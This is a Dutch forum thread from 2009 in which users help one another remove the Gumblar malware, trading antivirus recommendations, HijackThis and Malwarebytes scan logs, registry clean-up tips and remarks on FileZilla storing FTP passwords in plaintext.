Volgens ScanSafe is Gumblar erger dan Conficker, een worm die zich verspreidt via een gat in Windows, om vervolgens namaak antivirussoftware te installeren en de echte uit te schakelen. Gumblar was de eerste twee weken van deze maand goed voor veertig procent van de malware die werd geblokkeerd door ScanSafe.
De worm gedraagt zich anders dan Conficker, hij dringt dieper binnen en onderschept en monitort het webverkeer. Daarnaast wordt er een Trojaans paard geïnstalleerd dat data zoals wachtwoorden en gebruikersnamen steelt, aldus Cnet.
quote:JaOp dinsdag 11 augustus 2009 13:41 schreef MissBliss het volgende:
[..]
Ok
Ja goed idee wel
Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
[..]
Ja?
Ik durf er niet meer te kijken
je site is fucked up, dus ik neem aan dat iemand ermee bezig is quote:Ik vind het ook zeer hilarisch.Op dinsdag 11 augustus 2009 @ 13:42 schreef Mr.Noodle het volgende:
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..
sorry..
quote:Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
[..]
Ja
quote:Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig isOp dinsdag 11 augustus 2009 13:42 schreef Mr.Noodle het volgende:
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..
sorry..
Ik vind het werkelijk een KUT vrius
quote:Stiekem leef ik ook wel met je mee hoor..Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:
[..]
Ik vind het ook zeer hilarisch.
quote:ik krijg geen bad iframe meldingOp dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:
[..]
Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee?
Damn,wat ben ik blij dat er ook gwn linux bestaat!
quote:Het stickje? Ja, die zal ik ook scannen
[..]
ik krijg geen bad iframe melding
Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee?
quote:je CF en SD kaartje er al uitgehaaldOp dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:
[..]
Het stickje? Ja, die zal ik ook scannen
quote:Ja doeiOp dinsdag 11 augustus 2009 @ 13:47 schreef amvrosios het volgende:
Formateren die zooi,je blijft toch altijd met rotzooi zitten,
Damn,wat ben ik blij dat er ook gwn linux bestaat!
Dat doe ik over een week wel als het dan nog niet weg is
quote:Nu welOp dinsdag 11 augustus 2009 @ 13:49 schreef Re het volgende:
[..]
je CF en SD kaartje er al uitgehaald
iPhone ook maar?
Oh nee, das van Apple
quote:siOp dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:
[..]
Het stickje? Ja, die zal ik ook scannen
quote:vind je???Op dinsdag 11 augustus 2009 13:48 schreef Litso het volgende:
Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg.
Ik vind het echt een ideale scanner
quote:iphone heeft een ander besturingssysteemOp dinsdag 11 augustus 2009 13:50 schreef MissBliss het volgende:
[..]
Nu wel
iPhone ook maar?
Oh nee, das van Apple
scan ook maar je sd kaartjes
Ik update wel als malwarebytes klaar is!quote:Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.Op dinsdag 11 augustus 2009 13:51 schreef Qwea het volgende:
[..]
vind je???
Ik vind het echt een ideale scanner
Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.
quote:Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingenOp dinsdag 11 augustus 2009 13:55 schreef Litso het volgende:
[..]
Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.
Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.
Daar heb je instellingen die je kan aanpassen
quote:de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...Op dinsdag 11 augustus 2009 13:58 schreef Qwea het volgende:
[..]
Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen
Daar heb je instellingen die je kan aanpassen
quote:Ik zou toch malware bytes doen, gewoon voor de zekerheidOp dinsdag 11 augustus 2009 14:04 schreef Litso het volgende:
Nou, avast vindt ook niks dus het zal meevallen
quote:klopt. Maar het werkt welOp dinsdag 11 augustus 2009 14:02 schreef Re het volgende:
[..]
de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...
en het vreet niet zoveel geheugen 
quote:Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.Op dinsdag 11 augustus 2009 13:47 schreef amvrosios het volgende:
Formateren die zooi,je blijft toch altijd met rotzooi zitten,
Damn,wat ben ik blij dat er ook gwn linux bestaat!
quote:Dit al geprobeerd?Op dinsdag 11 augustus 2009 13:45 schreef Qwea het volgende:
[..]
Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is
Ik vind het werkelijk een KUT vrius
quote:Komen al die linux goeroes weerOp dinsdag 11 augustus 2009 14:14 schreef CasB het volgende:
[..]
Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.
quote:Het computer virus probleem is veel minder voorkomend op het UNIX platform, maar dat betekent niet dat het niet bestaat. UNIX virussen (hoewel erg weinig) bestaan wel degelijk. Toegevoegend, sommige van de oudste worms zijn gebaseerd op UNIX! Als je je data belangrijk vind, dan zal je deze feiten moeten accepteren.
(Noem één Linux vrius? Okay... Bliss.)
Dit gezegd te hebben, er zijn zeker (en niet verrassend) erg weinig virussen in het wild levensvatbaar op UNIX. Dit komt gedeeltelijk door toegangsrestricties in de werkomgeving. Bijvoorbeeld, als een gebruiker een geïnfecteerd bestand gebruikt, kan het alleen doen wat de gebruiker aan privileges heeft (onder normale omstandigheden-niet veel) dus op z'n minst zal het niet verspreid worden naar andere systemen. Maar als een supergebruiker (of iemand zonder enige restricties) een virus opent, kan het mogelijk het gehele system infecteren en doorgestuurd worden naar andere systemen... etc.
Ook moeten we onthouden, dat virussen onder UNIX besturingssystemen veel minder voorkomen simpel omdat dit besturingssyteem lang niet zo wijd verspreid is als DOS/Windows besturingssytemen voor thuisgebruikers. Als er meer mensen thuis gebruik zullen maken van UNIX, zullen er meer virussen hun weg zoeken. De opkomst van het GNU/Linux besturingssysteem heeft dit zeker aangetoond.
Wees gewaarschuwd, als UNIX-achtige systemen zoals GNU/Linux populairder worden en makkelijker voor thuisgebruik, zullen meer en meer onervaren gebruikers hun systeem laten opereren met volledige toegangsrechten voor allen en op die manier malware een makkelijke manier geven om hun systeem te verstoren.
quote:Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.
Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.
quote:Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:
[..]
Komen al die linux goeroes weer
[..]
Maar dat terzijde.
Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?
quote:Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd dit gevoel bij.Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:
[..]
Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.
Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.
quote:zou je gewoon op willen zoutenOp dinsdag 11 augustus 2009 14:28 schreef Walter_Sobchak het volgende:
[..]
Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd gevoel bij.
, dankquote:Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehadOp dinsdag 11 augustus 2009 14:27 schreef CasB het volgende:
[..]
Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.
Maar dat terzijde.
Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?
En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten
En het Apple en linuxgezeik mag van mij wel in een ander topic
quote:Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.Op dinsdag 11 augustus 2009 14:31 schreef Qwea het volgende:
[..]
Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad
En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten
quote:Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ectOp dinsdag 11 augustus 2009 14:50 schreef Mr.Noodle het volgende:
[..]
Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.
Je laat het een beetje klinken alsof formatten binnen een half u gepiept is
wast maar zo simpel quote:Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?Op dinsdag 11 augustus 2009 15:08 schreef Noork het volgende:
Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen.
Ik krijg iig geen avast melding meer
Als ik hem maximaliseer krijg ik zo'n wit scherm
quote:Moet toch zien waar het over gaatOp dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:
[..]
Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?
Ik krijg iig geen avast melding meer
En ik verwijt niemand, geef het alleen maar aan. Meestal val ik met Opera als browser en AVG buiten schot bij dit soort virussen...quote:Op dinsdag 11 augustus 2009 15:27 schreef MissBliss het volgende:
Volgens mij is Malwarebytes vastgelopen
Als ik hem maximaliseer krijg ik zo'n wit scherm
Ooh boy.
En als je hem in veilige modus draait?
quote:Ik vind het alleen een beetje dom van jeOp dinsdag 11 augustus 2009 15:31 schreef Noork het volgende:
[..]
Moet toch zien waar het over gaat
Maar goed Ga maar malware draaien
!quote:Is al opgelost. Hijackthis en een paar dingen verwijderen was voldoende.Op dinsdag 11 augustus 2009 15:32 schreef Qwea het volgende:
[..]
Ik vind het alleen een beetje dom van je
Ga maar malware draaien
quote:Taakbeheer liep zelfs vast
[..]
Ooh boy.
En als je hem in veilige modus draait?
Nou, poging 2!
quote:Dat staat er niet meer inOp dinsdag 11 augustus 2009 @ 15:35 schreef CantFazeMe het volgende:
Haal het linkje weg uit de OP misschien.
Er staat zelfs een waarschuwing!Ik zal hem wel even uit mn sig halen ook.
ik heb hem ook ?
quote:Dank je.Op dinsdag 11 augustus 2009 15:37 schreef MissBliss het volgende:
[..]
Dat staat er niet meer in
Ik zal hem wel even uit mn sig halen ook.
quote:O really?
quote:?
*zucht*
*malware bytes download
quote:ya, really
quote:
en dan die formhistory kan ook gewoon niet verwijderd worden
ennu zittie ook in places ik had godverdomme net mn laptop gekocht en geconfigged donderdag! quote:echt
quote:Mn hijackthis log. Roept u maar!Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:52:04, on 11-8-2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18813)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Samsung\EBM\EasyBatteryMgr3.exe
C:\Program Files\Samsung\Samsung Magic Doctor\MagicDoctorKbdHk.exe
C:\Program Files\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackground.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\igfxext.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Alwil Software\Avast4\ashSimpl.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O13 - Gopher Prefix:
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
--
End of file - 3746 bytes
quote:Ik geloof je wel hoor.
Verwijder hem maar snel.
quote:Nou dan heb je nog weinig spannende data. Formateren maar.
Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/
en dan die formhistory kan ook gewoon niet verwijderd worden
quote:ik heb nooit spannende data wat niet 30x gebackupt is.Op dinsdag 11 augustus 2009 15:53 schreef Swetsenegger het volgende:
[..]
Nou dan heb je nog weinig spannende data. Formateren maar.
Eerst eens zien of het met hijackthis en malware wil. Zo niet pleur ik straks alles wel leeg. Wat ik me afvraag... bij het installen van de pc is er een backup gemaakt toen windows klaar was... kan ik die gewoon terug zetten? of zit dat kreng daar ook in ?
quote:als jij mn hijackthis log wil checken?Op dinsdag 11 augustus 2009 15:53 schreef CantFazeMe het volgende:
[..]
Ik geloof je wel hoor.
Verwijder hem maar snel.
quote:dikke stront dus, blijkbaarOp dinsdag 11 augustus 2009 15:53 schreef MissBliss het volgende:
Je hebt toch Vista? Daar kon het toch juist niet op komen?
quote:'t ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?Op dinsdag 11 augustus 2009 15:55 schreef Qwea het volgende:
[..]
als jij mn hijackthis log wil checken?
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked
oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl
quote:Malware is al bezig. Hijack was eerder klaarOp dinsdag 11 augustus 2009 15:59 schreef CantFazeMe het volgende:
[..]
't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked
oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl
Windows errors related to oobefldr.dll?
oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"
ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?
quote:Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maarOp dinsdag 11 augustus 2009 16:01 schreef Qwea het volgende:
[..]
Malware is al bezig. Hijack was eerder klaar
Windows errors related to oobefldr.dll?
oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"
ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?
Ok. Laat die dll maar staan idd.
quote:Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthieldOp dinsdag 11 augustus 2009 @ 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
Maar dat doet ie dus kennelijk wél quote:O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)Op dinsdag 11 augustus 2009 16:04 schreef CantFazeMe het volgende:
[..]
Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar
Ok. Laat die dll maar staan idd.
weggepleurd
Nou, nu maar ff wachten op malwarebytes
quote:ja, daar kwam MM gisteren ook achterOp dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
en op zn werk gebruiken ze.... juist! filezilla quote:Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:
[..]
Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect
Je laat het een beetje klinken alsof formatten binnen een half u gepiept is
Kwestie belangrijk spul even doorscannen en dan verplaatsen naar USB stick. Vervolgens alleen die ene schijf formatteren...
quote:Op dinsdag 11 augustus 2009 16:09 schreef Mr.Noodle het volgende:
[..]
Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.
Dan kan ik dus gewoon als al dit niet helpt straks f4 doen en alles terug zetten
woeiquote:vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.
[..]
Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthield
tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet.
Nutteloos logje, aangezien het de smart scan was.
Wel de full doen, Q
quote:Gumblar is toch (ook) een packet sniffer, die je passwords jat als je inlogt, en ze dus niet uitleest uit een bestand?Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
quote:Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?Op dinsdag 11 augustus 2009 @ 16:12 schreef Swetsenegger het volgende:
[..]
vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.
tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet.
quote:Andere ftp prog nemen?Op dinsdag 11 augustus 2009 16:14 schreef MissBliss het volgende:
[..]
Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?
Heeft jouw malware dinges al wat gevonden?
quote:Geniaal!!Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
quote:Ik heb zo lang gezocht naar een handig ftp-prog
[..]
Andere ftp prog nemen?
Heeft jouw malware dinges al wat gevonden?
Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden
Daarna doe ik mailwaren-dinges wel weer.quote:Ik draai malware, en adawareOp dinsdag 11 augustus 2009 16:17 schreef MissBliss het volgende:
[..]
Ik heb zo lang gezocht naar een handig ftp-prog
Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden
En ik zat in mn register te zoeken naar die gumbar key, maar die is er gelukkig niet Dus ik wacht eerst dit maar even af.te verwijderen.
nou, dat deed ie dus wel. FF bleek na het gewoon afsluiten nog actief dus process gekilled. Ben nieuwd wat er nu verder aangegeven wordt. Ik zal die superantispyware er ook maar bij runnen ga is formhistory.sqlite er weer
!quote:Nou, ja,
ehm Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen
das krommalware bytes is wel een poosje bezig zeg
al 50 minquote:formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.Op dinsdag 11 augustus 2009 16:24 schreef Qwea het volgende:
zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\
ga is formhistory.sqlite er weer
quote:aaahOp dinsdag 11 augustus 2009 16:35 schreef CasB het volgende:
[..]
formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.
nou ja, de oude is iig weg
quote:Nou ja, aVast detecteert het probleem, dat is iig wat meer dan andere virusscanners doen..Op dinsdag 11 augustus 2009 16:34 schreef Qwea het volgende:
[..]
Nou, ja,
Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen
malware bytes is wel een poosje bezig zeg
Ja, full scan duurt een tijdje...
quote:ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat
quote:avast ziet hem hier niet eensOp dinsdag 11 augustus 2009 16:38 schreef Re het volgende:
[..]
ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
quote:Ik vind dat ze de kutklerelijers van zo'n virus voor een trein moeten duwenOp dinsdag 11 augustus 2009 16:39 schreef Re het volgende:
bij IT zijn ze trouwens ook nog bezig op mijn laptop
klootzakkenquote:ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgtOp dinsdag 11 augustus 2009 16:38 schreef Qwea het volgende:
ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat
quote:Heb ik iets gemist? Is avast niet goed?
Anyway: superantispyware heeft alleen cookies gevonden.
quote:Ja... alleen ik maar hopen dat ik toch geen gumblar hadOp dinsdag 11 augustus 2009 16:40 schreef Re het volgende:
[..]
ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt
quote:Malwarebytes' Anti-Malware 1.40
Database versie: 2601
Windows 6.0.6001 Service Pack 1
11-8-2009 16:46:32
mbam-log-2009-08-11 (16-46-32).txt
Scan type: Volledige Scan (C:\|D:\|)
Objecten gescand: 181146
Verstreken tijd: 1 hour(s), 0 minute(s), 42 second(s)
Geheugenprocessen geïnfecteerd: 0
Geheugenmodulen geïnfecteerd: 0
Registersleutels geïnfecteerd: 0
Registerwaarden geïnfecteerd: 0
Registerdata bestanden geïnfecteerd: 0
Mappen geïnfecteerd: 0
Bestanden geïnfecteerd: 0
Geheugenprocessen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Geheugenmodulen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registersleutels geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registerwaarden geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registerdata bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)
Mappen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)
quote:Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:
[..]
ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
Tevens staan er ook vaak rare opstartverwijzingen in MSconfig bij het tabblad Services en Startup. Dus alle verdachten verwijzingen daar ook verwijderen cq. uitvinken.
Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..
Anyways dit was een aardig tijdrovend karwei en achteraf had ik me bedacht dat formatteren een iets snellere oplossing zou zijn.
quote:Ik heb geboot, en draai opnieuw malwarebytes. Alstie namelijk na een boot terug komt, moet ik er nu ook weer zijn.Op dinsdag 11 augustus 2009 16:53 schreef Mr.Noodle het volgende:
[..]
